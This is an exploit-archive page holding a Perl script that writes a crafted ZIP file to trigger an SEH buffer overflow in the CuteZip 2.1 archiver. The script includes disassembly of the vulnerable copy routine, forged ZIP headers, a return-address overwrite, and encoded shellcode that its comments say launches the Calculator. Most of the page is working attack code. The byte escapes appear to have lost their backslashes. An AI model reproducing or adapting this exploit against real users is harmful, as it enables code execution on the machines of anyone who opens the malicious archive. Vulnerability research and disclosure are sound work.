Home / os / win7

CuteZip 2.1 Buffer Overflow

Posted on 14 February 2011

#!/usr/bin/perl
#
#[+]Exploit Title: Exploit Buffer Overflow CuteZip 2.1
#[+]Date: 02122011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.globalscape.com/files/cutezip20b.exe
#[+]Version: 2.1 build 9.24.1
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#            Comment in Brazilian Portuguese
#                       ||
#                       ||
#                       /
#
#Comentario para quem é do Brasil:
#
#Ola Lammers Brasileiros Copiando Receitas de Bolos na internet né,
#Um Bando de Lammers que dizem ser o Metasploit Brazil
#Caras Voces Nao sabem nem Programar em ruby,perl,python,c ou java
#Estude muito,nao suje o no do Metasploit.
#
#Esse Recado foi para o Metasploit Brasil se tiver Achando Ruim
#Me Contate por E-mail.
#
#
#
#Comment:
#
# The structure of this exploit has zip Copied exploits of the team Corelan
# Link: http://www.exploit-db.com/exploits/11764/
#
#
#                           Vulnerable function
#                                   ||
#                                   ||
#                                   /
#
# 0x0047CC0E                     .^72 CC          JB SHORT CuteZip.0047CBDC
# 0x0047CC10                     . F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC12                     . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC19                       8D49 00        LEA ECX,DWORD PTR DS:[ECX]
# 0x0047CC1C                     > 23D1           AND EDX,ECX
# 0x0047CC1E                     . 8A06           MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC20                     . 8807           MOV BYTE PTR DS:[EDI],AL
# 0x0047CC22                     . 8A46 01        MOV AL,BYTE PTR DS:[ESI+1]
# 0x0047CC25                     . C1E9 02        SHR ECX,2
# 0x0047CC28                     . 8847 01        MOV BYTE PTR DS:[EDI+1],AL
# 0x0047CC2B                     . 83C6 02        ADD ESI,2
# 0x0047CC2E                     . 83C7 02        ADD EDI,2
# 0x0047CC31                     . 83F9 08        CMP ECX,8
# 0x0047CC34                     .^72 A6          JB SHORT CuteZip.0047CBDC
# 0x0047CC36                     . F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>      ===> //Here is the function that occurs Buffer Overflow
# 0x0047CC38                     . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC3F                       90             NOP
# 0x0047CC40                     > 23D1           AND EDX,ECX
# 0x0047CC42                     . 8A06           MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC44                     . 8807           MOV BYTE PTR DS:[EDI],AL
# 0x0047CC46                     . 46             INC ESI
# 0x0047CC47                     . C1E9 02        SHR ECX,2
# 0x0047CC4A                     . 47             INC EDI
# 0x0047CC4B                     . 83F9 08        CMP ECX,8
# 0x0047CC4E                     .^72 8C          JB SHORT CuteZip.0047CBDC
# 0x0047CC50                     . F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC52                     . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC59                       8D49 00        LEA ECX,DWORD PTR DS:[ECX]
#
#
#
#
#
#
#


use IO::File;

if($^O=="windows")
{
system("cls");
system("color 4f");
}
else
{
system("clear");
}


sub banner
{
print q{

[+]Exploit: Exploit Buffer Overflow CuteZip 2.1
[+]Date: 02\12\2011
[+]Author: C4SS!0 G0M3S
[+]Home: www.invasao.com.br
[+]E-mail: Louredo_@hotmail.com
[+]Version: 2.1 build 9.24.1
[+]Thanks: Corelan Team, Skylined
[+]Impact: Hich

};
}
my $file = $ARGV[0];


if($#ARGV!=0)
{
banner;
print "[-]Usage: $0 <File Name>
";
print "[-]Exemple: $0 Exploit.zip
";

exit(0);
}
banner;

my $ldf_header = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

my $cdf_header = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $eofcdf_header = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

my $payload = "x41" x 1148;
my $nseh = "xebx07x90x90";
my $seh = pack('V',0x0040112F);

my $egg = "x41" x 2;
$egg .= "x61x61x61x51x58xFFxD0";

my $shellcode = "x41" x 123;

print "[*]Identifying the length Shellcode
";
sleep(1);

$shellcode = $shellcode.
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIOJDKJTSICL9MYQ8YRTQ4L".
"41K6IXI81WBLCZKKL6QQC4NUSV8KJMKLIY2JJN5RRQJJKMUKKOO9JZ7Z884POWXJJLXSS8CON5XJW912".
"6WONPTLG14NQQOQPMYLMQOSFQUN9FUSTKXQFKQUPL4OIS4W5U1T3FLHQ2EHPKOYKTDWZSHQMQM7MPBKL".#SHELLCODE WinExec("CALC",0);
"KVW7HKWHCNOP2NOKCHNMGNSO8LYMLS0OJTXRUPYQSFKNYFVBZK47DQVNZFBNGWMNPPQPZQV337XMPXCL".
"VLJ0C3C3CVKMWKRL0GWBLSP1NVKBSOUN4V7L8G8WKYNOJ2NMOOKTYTNLFE1XOFOHXHMNPZ5LRKOOUNLK".
"HLUVXGLMWHP7KWNMXSB644O4CEMVCLPO6QJ9KYJPKXJD4LCTYPOTYVTJTLSQ4OGKMRK8SI7D7BNMO2OB".
"K4BX0S5LKNQX14OM8646B9CZOA";

print "[*]The length is Shellcode:".(length($shellcode)-123)."
";
sleep(1);

my $junk = "x42" x (4064-length($payload.$nseh.$seh.$egg.$shellcode));

$payload = $payload.$nseh.$seh.$egg.$shellcode.$junk;

$payload = $payload.".txt";
my $Exploit = $ldf_header.$payload.
$cdf_header.$payload.
$eofcdf_header;
print "[*]Creating the file $file
";
sleep(1);

open(f,">$file")|| die("Error:
$!
");
print f $Exploit;
close(f);
print "[*]The File $file Created Successfully
";
sleep(1);

 

TOP